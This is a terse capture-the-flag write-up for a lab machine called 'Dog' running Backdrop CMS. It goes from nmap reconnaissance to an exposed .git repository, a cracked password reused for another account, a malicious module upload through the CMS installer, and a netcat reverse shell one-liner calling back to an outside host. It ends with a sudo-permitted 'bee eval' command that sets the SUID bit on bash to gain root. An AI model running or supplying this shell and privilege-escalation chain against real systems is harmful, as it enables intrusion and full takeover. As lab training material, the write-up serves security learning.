Dog - Writeup

1 minute read

Dog

Reconnaissance

IP: 10.10.11.58

NMAP

nmap -T4 -A -p- 10.10.11.58

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 03:21 EDT
Nmap scan report for 10.10.11.58
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-title: Home | Dog
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   31.36 ms 10.10.14.1
2   31.70 ms 10.10.11.58

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.06 seconds

Website

Site

http://10.10.11.58/

http://10.10.11.58/.git/logs/refs/heads/master

crack and we have tiffany:BackDropJ2024DS2024

https://www.exploit-db.com/exploits/52021

http://10.10.11.58/?q=admin/installer/manual

tar -czvf shell.tar.gz shell

http://10.10.11.58//modules/shell/shell.php

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 4444 >/tmp/f

TTY shell

/bin/sh -i

su johncusack
	BackDropJ2024DS2024

Privilege Escalation

sudo -l

sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('chmod u+s /bin/bash');" 
bash -p

Share on

X Facebook LinkedIn Bluesky

Dog - Writeup

Dog

Reconnaissance

NMAP

Website

Site

Privilege Escalation

Share on

You May Also Enjoy

Tomghost - Writeup

Thompson - Writeup

Skynet - Writeup

RootMe - Writeup